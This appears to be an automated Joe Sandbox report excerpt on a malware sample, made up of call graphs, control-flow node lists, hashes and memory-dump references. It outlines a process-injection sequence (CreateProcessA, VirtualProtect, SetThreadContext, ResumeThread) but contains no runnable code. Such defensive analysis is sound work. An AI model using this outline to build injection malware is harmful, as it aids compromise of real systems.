16359->16294 16361 6aac528 SetThreadContext 16360->16361 16363 6aac5b5 16361->16363 16363->16294 16365 6aac97a ResumeThread 16364->16365 16366 6aac952 16364->16366 16368 6aacdb9 16365->16368 16368->16327 16370 6aacd48 ResumeThread 16369->16370 16372 6aacdb9 16370->16372 16372->16327 16374 6aacd88 ResumeThread 16373->16374 16376 6aacdb9 16374->16376 16376->16327 16130 6aa17f9 16134 6aa1838 16130->16134 16138 6aa1831 16130->16138 16131 6aa1820 16135 6aa1880 SetKernelObjectSecurity 16134->16135 16137 6aa18c5 16135->16137 16137->16131 16139 6aa1880 SetKernelObjectSecurity 16138->16139 16141 6aa18c5 16139->16141 16141->16131 16142 1770490 16143 177049e 16142->16143 16147 17709d8 16143->16147 16151 17709c8 16143->16151 16144 177051c 16155 1770b08 16147->16155 16163 1770af8 16147->16163 16148 17709eb 16148->16144 16152 17709eb 16151->16152 16153 1770b08 2 API calls 16151->16153 16154 1770af8 2 API calls 16151->16154 16152->16144 16153->16152 16154->16152 16156 1770b22 16155->16156 16171 17701b0 16156->16171 16158 1770b56 16159 17701c8 VirtualProtect 16158->16159 16160 1770c33 16159->16160 16161 17701c8 VirtualProtect 16160->16161 16162 1770c63 16161->16162 16162->16148 16164 1770b22 16163->16164 16165 17701b0 LoadLibraryA 16164->16165 16166 1770b56 16165->16166 16175 17701c8 16166->16175 16169 17701c8 VirtualProtect 16170 1770c63 16169->16170 16170->16148 16174 1770c90 16171->16174 16172 1770d52 LoadLibraryA 16173 1770d91 16172->16173 16174->16172 16174->16174 16176 1770f78 VirtualProtect 16175->16176 16178 1770c33 16176->16178 16178->16169 16377 6aa4b10 16380 17701c8 VirtualProtect 16377->16380 16381 1770f70 16377->16381 16378 6aa4b3c 16380->16378 16382 1770fc0 VirtualProtect 16381->16382 16383 1770ffa 16382->16383 16383->16378

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 0 6aab240-6aab25c 1 6aab261 0->1 2 6aab266-6aab27b 1->2 3 6aab39a-6aab3a8 2->3 4 6aab281 2->4 50 6aab3b0 3->50 4->1 4->3 5 6aab2aa-6aab317 4->5 6 6aab288-6aab29c 4->6 7 6aab449-6aab458 4->7 8 6aab52e 4->8 9 6aab50e-6aab512 4->9 10 6aab48f-6aab4ae 4->10 11 6aab3da-6aab3ed 4->11 12 6aab29e-6aab2a8 4->12 13 6aab31c-6aab37b 4->13 14 6aab45d-6aab46c 4->14 15 6aab3f2-6aab3fd 4->15 16 6aab3b3 4->16 17 6aab4d3-6aab4f2 4->17 18 6aab4b0 4->18 19 6aab471-6aab47c 4->19 20 6aab4f4-6aab50c 4->20 5->2 6->2 21 6aab3b8-6aab3cd 7->21 26 6aab52f 8->26 24 6aab51b 9->24 25 6aab514-6aab519 9->25 10->18 11->18 12->2 48 6aab37d-6aab382 13->48 49 6aab384 13->49 14->21 40 6aab3ff-6aab405 15->40 41 6aab415-6aab42b 15->41 16->21 23 6aab4b5-6aab4ca 17->23 18->23 37 6aab47e-6aab483 19->37 38 6aab485 19->38 20->23 21->10 33 6aab3d3 21->33 23->8 31 6aab4cc 23->31 36 6aab520-6aab52c 24->36 25->36 26->26 31->8 31->9 31->17 31->18 31->20 33->7 33->8 33->9 33->10 33->11 33->14 33->15 33->16 33->17 33->18 33->19 33->20 36->23 44 6aab48a 37->44 38->44 45 6aab409-6aab40b 40->45 46 6aab407 40->46 53 6aab434-6aab436 41->53 44->21 45->41 46->41 51 6aab389-6aab395 48->51 49->51 50->16 51->2 54 6aab438-6aab43d 53->54 55 6aab43f 53->55 56 6aab444 54->56 55->56 56->21
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.320913948.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6aa0000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID:
                    • String ID: f`.o$i;%o$j;%o$p45o$q;%o$s45o$t;%o$u;%o$u;%o$v;%o$w;%o$y`.o
                    • API String ID: 0-3406674395
                    • Opcode ID: 426387c2268b8549068adc057abe7624f53bacb113cb93ad695b88bd76b214eb
                    • Instruction ID: aac00ef3d9a718da6ab82f4ec979ce343daab6307c169983a0e8d9b17722cd55
                    • Opcode Fuzzy Hash: 426387c2268b8549068adc057abe7624f53bacb113cb93ad695b88bd76b214eb
                    • Instruction Fuzzy Hash: CD61D671F10325CFE748AEA9E86526DB5B3ABC8710F18912BE507EB344DB748C118BE1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 57 6aab230-6aab25c 59 6aab261 57->59 60 6aab266-6aab27b 59->60 61 6aab39a-6aab3a0 60->61 62 6aab281 60->62 97 6aab3a8 61->97 62->59 62->61 63 6aab2aa-6aab317 62->63 64 6aab288-6aab29c 62->64 65 6aab449-6aab458 62->65 66 6aab52e 62->66 67 6aab50e-6aab512 62->67 68 6aab48f-6aab4ae 62->68 69 6aab3da-6aab3ed 62->69 70 6aab29e-6aab2a8 62->70 71 6aab31c-6aab37b 62->71 72 6aab45d-6aab46c 62->72 73 6aab3f2-6aab3fd 62->73 74 6aab3b3 62->74 75 6aab4d3-6aab4f2 62->75 76 6aab4b0 62->76 77 6aab471-6aab47c 62->77 78 6aab4f4-6aab50c 62->78 63->60 64->60 79 6aab3b8-6aab3cd 65->79 84 6aab52f 66->84 82 6aab51b 67->82 83 6aab514-6aab519 67->83 68->76 69->76 70->60 106 6aab37d-6aab382 71->106 107 6aab384 71->107 72->79 98 6aab3ff-6aab405 73->98 99 6aab415-6aab421 73->99 74->79 81 6aab4b5-6aab4ca 75->81 76->81 95 6aab47e-6aab483 77->95 96 6aab485 77->96 78->81 79->68 91 6aab3d3 79->91 81->66 89 6aab4cc 81->89 94 6aab520-6aab52c 82->94 83->94 84->84 89->66 89->67 89->75 89->76 89->78 91->65 91->66 91->67 91->68 91->69 91->72 91->73 91->74 91->75 91->76 91->77 91->78 94->81 102 6aab48a 95->102 96->102 108 6aab3b0 97->108 103 6aab409-6aab40b 98->103 104 6aab407 98->104 110 6aab429-6aab42b 99->110 102->79 103->99 104->99 109 6aab389-6aab395 106->109 107->109 108->74 109->60 111 6aab434-6aab436 110->111 112 6aab438-6aab43d 111->112 113 6aab43f 111->113 114 6aab444 112->114 113->114 114->79
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.320913948.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6aa0000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID:
                    • String ID: f`.o$i;%o$j;%o$p45o$u;%o$u;%o$v;%o$w;%o
                    • API String ID: 0-863800063
                    • Opcode ID: b3667560cacc718ce00050247382099b3f51382b4bd3137cc343aade83f0783d
                    • Instruction ID: 5b4558973957a671aafa82cc072d0f610eb6ab91184adbab5049f023f2a4f848
                    • Opcode Fuzzy Hash: b3667560cacc718ce00050247382099b3f51382b4bd3137cc343aade83f0783d
                    • Instruction Fuzzy Hash: 4161D871F10315CFE748AE69E86527DB6B3AB88710F18912BE507EB344DB748D118BE1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 178 1775fa8-1775fcf 180 1776031-177605a 178->180 181 1775fd1-1775fde 178->181 187 1776063-177606f 180->187 188 177605c-177605e 180->188 181->180 182 1775fe0-1776030 181->182 192 1776071-1776073 187->192 193 1776078-177608d 187->193 189 1776136-177613b 188->189 192->189 198 17760a1-17760ad 193->198 199 177608f-177609a 193->199 203 17760af-17760b8 198->203 204 17760ba-17760bc 198->204 199->198 203->204 205 17760be-17760ca 204->205 206 17760cc-17760d0 204->206 205->206 212 17760e2-17760ec 205->212 208 17760d2-17760dc 206->208 209 17760de-17760e0 206->209 213 1776148-1776154 208->213 209->189 215 17760ee-17760fa 212->215 216 177613c-1776146 212->216 218 1776156-177615f 213->218 219 1776161-1776163 213->219 222 177610c-177610e 215->222 223 17760fc-177610a 215->223 216->213 218->189 219->189 222->189 223->222 226 1776110-1776116 223->226 227 177611a 226->227 228 1776118 226->228 229 177611c-177611e 227->229 228->229 230 1776165-1776212 229->230 231 1776120-177612c 229->231 244 1776214 230->244 245 177621b-177621f 230->245 231->230 234 177612e 231->234 234->189 244->245 246 1776236-1776250 call 1771e50 245->246 247 1776221-1776225 245->247 255 1776252 246->255 256 177625b-177625f 246->256 248 17764f4-17764ff 247->248 249 177622b-1776233 247->249 257 1776506-177656a 248->257 249->246 255->256 258 1776261-1776267 256->258 259 177626a-177628e 256->259 280 1776571-17765d5 257->280 258->259 267 1776294-17762a6 259->267 268 1776429-177643e call 17720b0 259->268 267->257 274 17762ac-17762b0 267->274 270 1776443 268->270 273 17764e5-17764ec 270->273 274->257 275 17762b6-17762c0 274->275 279 17762c6-17762ca 275->279 275->280 279->268 281 17762d0-17762d4 279->281 312 17765dc-1776640 280->312 284 17762d6-17762dd 281->284 285 17762e3-17762e7 281->285 284->268 284->285 286 1776647-1776675 call 1771f70 285->286 287 17762ed-17762fd 285->287 304 1776677-177667b 286->304 305 177667f-1776680 286->305 293 17762ff-1776305 287->293 294 177632d-1776333 287->294 298 1776307 293->298 299 1776309-1776315 293->299 296 1776337-1776343 294->296 297 1776335 294->297 301 1776345-1776363 296->301 297->301 303 1776317-1776327 298->303 299->303 301->268 313 1776369-177636b 301->313 303->294 303->312 304->305 309 177667d 304->309 309->305 312->286 314 1776386-177638a 313->314 315 177636d-1776381 313->315 314->268 318 1776390-177639a 314->318 315->273 318->268 324 17763a0-17763a6 318->324 325 17764ef 324->325 326 17763ac-17763af 324->326 325->248 326->286 328 17763b5-17763d2 326->328 333 17763d4-17763ef 328->333 334 1776410-1776424 328->334 341 17763f7-177640b 333->341 342 17763f1-17763f5 333->342 334->273 341->273 342->268 342->341
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.317042030.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1770000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID:
                    • String ID: <Bl$D0Bl
                    • API String ID: 0-2072377930
                    • Opcode ID: 003e239b20152cc47458a836051bd987f7242fe280d7a60e3db672b10e442cfb
                    • Instruction ID: 6d3c55f52952d8df2fb9d2afc1a783727fafe29e522d85067bded8606ba35ad8
                    • Opcode Fuzzy Hash: 003e239b20152cc47458a836051bd987f7242fe280d7a60e3db672b10e442cfb
                    • Instruction Fuzzy Hash: 42028E34B005148FDF25DBB9D858AAEBBFAAF88704F144469E506DB3A9DB31DC01CB91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 344 6aa0d90-6aa0dbc 346 6aa0dc1 344->346 347 6aa0dc6-6aa0ddb 346->347 348 6aa0f9a-6aa0fad 347->348 349 6aa0de1 347->349 354 6aa0faf 348->354 349->346 349->348 350 6aa0e3a-6aa0f95 349->350 351 6aa0e08-6aa0e13 349->351 352 6aa0de8-6aa0dec 349->352 353 6aa0ff9-6aa1011 349->353 349->354 355 6aa0fd2-6aa0fd6 349->355 356 6aa0ff2-6aa0ff7 349->356 357 6aa1013 349->357 358 6aa0e15 349->358 350->347 351->347 360 6aa0dee-6aa0df3 352->360 361 6aa0df5 352->361 359 6aa0fb4-6aa0fc9 353->359 354->359 362 6aa0fd8-6aa0fdd 355->362 363 6aa0fdf 355->363 356->359 369 6aa0e1e-6aa0e38 358->369 359->357 367 6aa0fcb 359->367 366 6aa0dfa-6aa0e06 360->366 361->366 368 6aa0fe4-6aa0ff0 362->368 363->368 366->347 367->353 367->354 367->355 367->356 367->357 368->359 369->347
                    Strings
                    Memory Dump Source
                    • Source File: 00000000.00000002.320913948.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6aa0000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID:
                    • String ID: `~>l$IBl
                    • API String ID: 0-3926603690
                    • Opcode ID: d7a6492954f17d65212833236584e9dd341e1933c7e087daa46828b58316243f
                    • Instruction ID: 11c00651852e059ecb335980d4e25c74dee94c97e396b534ff6ebfaf1c7ee402
                    • Opcode Fuzzy Hash: d7a6492954f17d65212833236584e9dd341e1933c7e087daa46828b58316243f
                    • Instruction Fuzzy Hash: 9651E571F00225CFD718DEA9D9556AEB6B7ABC8314F24813AD406EB384DB749C46CB80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.317042030.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1770000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 54c4ebeb3bf1890b28927ae10ae844d7a4c140ccf182bbb1a95d44a3e85616f9
                    • Instruction ID: ece4c984ffae26b25a8341aa566e87f8f4383b6a6b717f9a83704fd7b0105d53
                    • Opcode Fuzzy Hash: 54c4ebeb3bf1890b28927ae10ae844d7a4c140ccf182bbb1a95d44a3e85616f9
                    • Instruction Fuzzy Hash: F752AE35B001158FDF18DF69C884AADFBB6BF88714F158469E916AB366DB31EC01CB90
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.317042030.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1770000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 51dd2d96ad1a4d2fe849b44a7a3164c729b060ee25a99ea47e294345aebfa316
                    • Instruction ID: 0861dc2acd60a4223582b8f991da1aedfc6160617d734cf1a0ef887a02af5e97
                    • Opcode Fuzzy Hash: 51dd2d96ad1a4d2fe849b44a7a3164c729b060ee25a99ea47e294345aebfa316
                    • Instruction Fuzzy Hash: CF2219356005149FDB05DFA8C844E69BBB6FF8C718B1680A8E6069F376CB36EC51DB50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.317042030.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1770000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: ef0a0d3eff8e5fdcb2713530e224dfbd1dbf9499e7f5dc1c0566995989be8b48
                    • Instruction ID: 9c956ab9abdb3fa3303af0528b6de07053136160a967f478c40b157be2dce6e6
                    • Opcode Fuzzy Hash: ef0a0d3eff8e5fdcb2713530e224dfbd1dbf9499e7f5dc1c0566995989be8b48
                    • Instruction Fuzzy Hash: 4B126831A00605CFCB19DF68D988AAEBBF2FF88305F548968D406AB695DB31F945CF50
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.317042030.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1770000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: f7fae408fd61539e8c4dcce4cc93934de393300d04c889b426a982c64aac1c8f
                    • Instruction ID: 5d4f224fd12e65758d03c60324b6824d99f8ddf725bf059b7623691666b77993
                    • Opcode Fuzzy Hash: f7fae408fd61539e8c4dcce4cc93934de393300d04c889b426a982c64aac1c8f
                    • Instruction Fuzzy Hash: 02D1FB75F402198BDB0CDEA9DD557ADF6E39BC8350F19912AD506EF384DA78CD028B80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.317042030.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1770000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: cde1a4aa29fe2e418575d33a5de8cadff27c67513778e27b843e97f4e72ceaa5
                    • Instruction ID: e875ecfc45c4c8efad5d37f8cb6bdfdabb51618a31652439284ba41fe9192211
                    • Opcode Fuzzy Hash: cde1a4aa29fe2e418575d33a5de8cadff27c67513778e27b843e97f4e72ceaa5
                    • Instruction Fuzzy Hash: E0D1FC75F402158BDB0CDEA9DD557ADF6E39BC8350F19912AD506EF388DA78CD028B80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.317042030.0000000001770000.00000040.00000800.00020000.00000000.sdmp, Offset: 01770000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_1770000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5e674c7e89202eab9f0340b40adb8bfeb2a144992b87b695a590060649a10cf2
                    • Instruction ID: 51bddad894d76d356a9cb89fcbb63e3b01027f7b4053fe4be1de3faf14cdf70b
                    • Opcode Fuzzy Hash: 5e674c7e89202eab9f0340b40adb8bfeb2a144992b87b695a590060649a10cf2
                    • Instruction Fuzzy Hash: 6ED1FB75F402198BDB0CDEA9DD557ADF6E39BC8350F19912AD506EF384DA78CD028B80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.320913948.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6aa0000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 71a922b2da71f9c651f4cc3361855b3e7e9e2c706ae83a29ee882b799e9b8b82
                    • Instruction ID: 2dfdf0c5969629895c8d053ee60c5f5b3fe02c5c5b6f5d4e94713b517598b685
                    • Opcode Fuzzy Hash: 71a922b2da71f9c651f4cc3361855b3e7e9e2c706ae83a29ee882b799e9b8b82
                    • Instruction Fuzzy Hash: E7918B36F502218BE744CAACDC502FA76E7DBC9220B1E9167D90AEB340DA78CD5247D0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.320913948.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6aa0000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: e326f77504cfb9d62dd87d7ccf1d578f0b1381a8933fb1e45f6948c2c9450cb3
                    • Instruction ID: 6e573f3e220e26d40e40aa148467d030b13d572c5e1a2b8a0e1ba637d0ba73e5
                    • Opcode Fuzzy Hash: e326f77504cfb9d62dd87d7ccf1d578f0b1381a8933fb1e45f6948c2c9450cb3
                    • Instruction Fuzzy Hash: FE816A36F502318BE74889ADDC512AB75E79BC8620B1E9127E90BEB344EE78CD5247D0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.320913948.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6aa0000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 8e66b4fb60d4a574e7eab86321ad248335208c2d64959f02e07dca5ce59df315
                    • Instruction ID: 19f08caf64c73f00ffaca1077334831c6064b3851e594cfe66c498857926d482
                    • Opcode Fuzzy Hash: 8e66b4fb60d4a574e7eab86321ad248335208c2d64959f02e07dca5ce59df315
                    • Instruction Fuzzy Hash: E5910534F053148FDB48DBA9D8946AAB6F3ABC9311F18846BE506DF340DB78CC168B85
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.320913948.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6aa0000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 598d5b1a5a3cbad734d1c2bf1e316e45ba11f4ba0653c6ec56fb0b86c4712fdf
                    • Instruction ID: a091d1ee8af02d3379e959651de3c84ff48aea62f425b7c7e79c1dd576b6c9c3
                    • Opcode Fuzzy Hash: 598d5b1a5a3cbad734d1c2bf1e316e45ba11f4ba0653c6ec56fb0b86c4712fdf
                    • Instruction Fuzzy Hash: 4C715836F502318BE748C9ADDC612AA71E3ABC862471E9527D90BEB344EE78CD5247D0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.320913948.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6aa0000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: bfe30575b4f2a9f5db9f070d5efcb2520cbceaf2db76394f817c9aea82eaabfd
                    • Instruction ID: 4c007da13d74f8eef0d6b385eb99afa893bfda3d293cc8d205721dadc5596f02
                    • Opcode Fuzzy Hash: bfe30575b4f2a9f5db9f070d5efcb2520cbceaf2db76394f817c9aea82eaabfd
                    • Instruction Fuzzy Hash: 38715736F502318BE748C9ADDC612BA71E3ABC862471E9527D90BEB344EE78CD5247D0
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.320913948.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6aa0000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: db9e1171101aceceec756a04846ea5aaff8ef3a22f7c3a71aca452446e46f021
                    • Instruction ID: 2684fd3eeb7f5bc6842424607273c0bde83e9071525cf38381f9f1d6f0910e2b
                    • Opcode Fuzzy Hash: db9e1171101aceceec756a04846ea5aaff8ef3a22f7c3a71aca452446e46f021
                    • Instruction Fuzzy Hash: 6E81F775F103148FDB48DAA9D8946AEB6F3ABC8311F18842BE506DF740DB78DC128B85
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Memory Dump Source
                    • Source File: 00000000.00000002.320913948.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6aa0000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: 5a68072ae1574ac39e4254c8f699771e7c39d4f289bfe4e8eabe5ffd090d6107
                    • Instruction ID: 8275b1896da817130133ca089755eee83e916c00710c66d3e6a45e1f133516c8
                    • Opcode Fuzzy Hash: 5a68072ae1574ac39e4254c8f699771e7c39d4f289bfe4e8eabe5ffd090d6107
                    • Instruction Fuzzy Hash: E6618F75E402298FCB64DF65CC447AABBF6AB49710F1091E6D509EB340DB309E81CF80
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 381 6aac94a-6aac950 382 6aac97a-6aacdb7 ResumeThread 381->382 383 6aac952-6aac970 381->383 387 6aacdb9-6aacdbf 382->387 388 6aacdc0-6aacde5 382->388 387->388
                    Memory Dump Source
                    • Source File: 00000000.00000002.320913948.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6aa0000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID:
                    • String ID:
                    • API String ID:
                    • Opcode ID: a8f8977516a9bd7ff083f25062e2b08393c71048db4de8ef65b65d9ea6d85757
                    • Instruction ID: f6e8d73931c61666774b93211783da61abd794ee7fa3300a66ad471131ecb315
                    • Opcode Fuzzy Hash: a8f8977516a9bd7ff083f25062e2b08393c71048db4de8ef65b65d9ea6d85757
                    • Instruction Fuzzy Hash: 1E21AFB19043948FEB11DFA9C8447DEBFF4AF8A324F14885BC456AB251C7349905CFA1
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 392 6aac194-6aac235 395 6aac26e-6aac28e 392->395 396 6aac237-6aac241 392->396 403 6aac290-6aac29a 395->403 404 6aac2c7-6aac2f6 395->404 396->395 397 6aac243-6aac245 396->397 398 6aac268-6aac26b 397->398 399 6aac247-6aac251 397->399 398->395 401 6aac253 399->401 402 6aac255-6aac264 399->402 401->402 402->402 405 6aac266 402->405 403->404 406 6aac29c-6aac29e 403->406 410 6aac2f8-6aac302 404->410 411 6aac32f-6aac3e9 CreateProcessA 404->411 405->398 408 6aac2a0-6aac2aa 406->408 409 6aac2c1-6aac2c4 406->409 412 6aac2ae-6aac2bd 408->412 413 6aac2ac 408->413 409->404 410->411 415 6aac304-6aac306 410->415 424 6aac3eb-6aac3f1 411->424 425 6aac3f2-6aac478 411->425 412->412 414 6aac2bf 412->414 413->412 414->409 416 6aac308-6aac312 415->416 417 6aac329-6aac32c 415->417 419 6aac316-6aac325 416->419 420 6aac314 416->420 417->411 419->419 422 6aac327 419->422 420->419 422->417 424->425 435 6aac47a-6aac47e 425->435 436 6aac488-6aac48c 425->436 435->436 437 6aac480 435->437 438 6aac48e-6aac492 436->438 439 6aac49c-6aac4a0 436->439 437->436 438->439 440 6aac494 438->440 441 6aac4a2-6aac4a6 439->441 442 6aac4b0-6aac4b4 439->442 440->439 441->442 443 6aac4a8 441->443 444 6aac4c6-6aac4cd 442->444 445 6aac4b6-6aac4bc 442->445 443->442 446 6aac4cf-6aac4de 444->446 447 6aac4e4 444->447 445->444 446->447 449 6aac4e5 447->449 449->449
                    APIs
                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06AAC3D6
                    Memory Dump Source
                    • Source File: 00000000.00000002.320913948.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6aa0000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID:
                    • API String ID: 963392458-0
                    • Opcode ID: 0d805d33530296dbaf020e2c936c70d5f69b018e5672853860a1824bb61fe7f5
                    • Instruction ID: f0a409819cc76d32506869208f6f4cf03ab3e8e6b295e1ef8a7b341c8a801b39
                    • Opcode Fuzzy Hash: 0d805d33530296dbaf020e2c936c70d5f69b018e5672853860a1824bb61fe7f5
                    • Instruction Fuzzy Hash: 18A15A71D00319DFEB54EFA9C841BEEBBB2BB48314F0485AAD849A7240DB749985CF91
                    Uniqueness

                    Uniqueness Score: -1.00%

                    Control-flow Graph

                    • Executed
                    • Not Executed
                    control_flow_graph 450 6aac1a0-6aac235 452 6aac26e-6aac28e 450->452 453 6aac237-6aac241 450->453 460 6aac290-6aac29a 452->460 461 6aac2c7-6aac2f6 452->461 453->452 454 6aac243-6aac245 453->454 455 6aac268-6aac26b 454->455 456 6aac247-6aac251 454->456 455->452 458 6aac253 456->458 459 6aac255-6aac264 456->459 458->459 459->459 462 6aac266 459->462 460->461 463 6aac29c-6aac29e 460->463 467 6aac2f8-6aac302 461->467 468 6aac32f-6aac3e9 CreateProcessA 461->468 462->455 465 6aac2a0-6aac2aa 463->465 466 6aac2c1-6aac2c4 463->466 469 6aac2ae-6aac2bd 465->469 470 6aac2ac 465->470 466->461 467->468 472 6aac304-6aac306 467->472 481 6aac3eb-6aac3f1 468->481 482 6aac3f2-6aac478 468->482 469->469 471 6aac2bf 469->471 470->469 471->466 473 6aac308-6aac312 472->473 474 6aac329-6aac32c 472->474 476 6aac316-6aac325 473->476 477 6aac314 473->477 474->468 476->476 479 6aac327 476->479 477->476 479->474 481->482 492 6aac47a-6aac47e 482->492 493 6aac488-6aac48c 482->493 492->493 494 6aac480 492->494 495 6aac48e-6aac492 493->495 496 6aac49c-6aac4a0 493->496 494->493 495->496 497 6aac494 495->497 498 6aac4a2-6aac4a6 496->498 499 6aac4b0-6aac4b4 496->499 497->496 498->499 500 6aac4a8 498->500 501 6aac4c6-6aac4cd 499->501 502 6aac4b6-6aac4bc 499->502 500->499 503 6aac4cf-6aac4de 501->503 504 6aac4e4 501->504 502->501 503->504 506 6aac4e5 504->506 506->506
                    APIs
                    • CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06AAC3D6
                    Memory Dump Source
                    • Source File: 00000000.00000002.320913948.0000000006AA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AA0000, based on PE: false
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_0_2_6aa0000_qpwx2wT5ky.jbxd
                    Similarity
                    • API ID: CreateProcess
                    • String ID:
                    • API String ID: 963392458-0
